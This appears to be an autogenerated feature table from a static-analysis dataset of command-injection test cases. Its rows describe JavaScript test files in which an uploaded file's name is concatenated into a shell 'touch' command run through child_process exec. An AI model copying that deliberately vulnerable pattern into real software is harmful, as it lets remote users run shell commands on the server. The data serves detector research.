autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:10 | form2.on | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:10 | form2.on | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | exceptional return of form2.o ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | exceptional return of form2.o ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | exceptional return of form2.o ... OK\\n }) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | exceptional return of form2.o ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | exceptional return of form2.o ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:60:4 | form2.o ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:9:58:10 | on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:9:58:10 | on | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:9:58:10 | on | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:9:58:10 | on | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:9:58:10 | on | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | CalleeFlexibleAccessPath | form2.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | calleeImports | multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:12:58:17 | 'part' | receiverName | form2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | exec | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | this | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:58:19 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | exceptional return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | CalleeFlexibleAccessPath | form2.on | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | calleeImports | multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | functio ... OK\\n } | receiverName | form2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:20:60:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:30:58:33 | part | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:8 | exec | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:8 | exec | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:8 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exceptional return of exec("t ... lename) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exceptional return of exec("t ... lename) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exceptional return of exec("t ... lename) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exceptional return of exec("t ... lename) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exceptional return of exec("t ... lename) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:5:59:34 | exec("t ... lename) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:17 | "touch " | stringConcatenatedWith | -endpoint- part.filename | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:10:59:33 | "touch ... ilename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:24 | part | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:24 | part | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:24 | part | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:24 | part | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:24 | part | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:21:59:33 | part.filename | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:26:59:33 | filename | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:26:59:33 | filename | contextSurroundingFunctionParameters | (req, res)\n(part) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:26:59:33 | filename | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:26:59:33 | filename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:59:26:59:33 | filename | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:7 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:7 | form2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:7 | form2 | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:7 | form2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:7 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:13 | form2.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:13 | form2.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:13 | form2.parse | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:13 | form2.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:13 | form2.parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | exceptional return of form2.parse(req) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | exceptional return of form2.parse(req) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | exceptional return of form2.parse(req) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | exceptional return of form2.parse(req) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | exceptional return of form2.parse(req) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:3:61:18 | form2.parse(req) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:9:61:13 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:9:61:13 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:9:61:13 | parse | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:9:61:13 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:9:61:13 | parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | CalleeFlexibleAccessPath | form2.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | calleeImports | multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:61:15:61:17 | req | receiverName | form2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:4:63:9 | listen | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:4:63:9 | listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:4:63:9 | listen | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | CalleeFlexibleAccessPath | http.createServer().listen | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:63:11:63:14 | 8080 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:0 | this | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | url | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:1:1:1 | url | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:8 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:8 | http | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http = ... "http") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http = ... "http") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:5:1:26 | http = ... "http") | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:18 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:18 | require | fileImports | cross-spawn cross-spawn-async exec exec-async execa foreground-child http opener remote-exec ssh2 ssh2-streams url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | exceptional return of require("http") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:1:12:1:26 | exceptional return of require("http") | contextSurroundingFunctionParameters | | +| 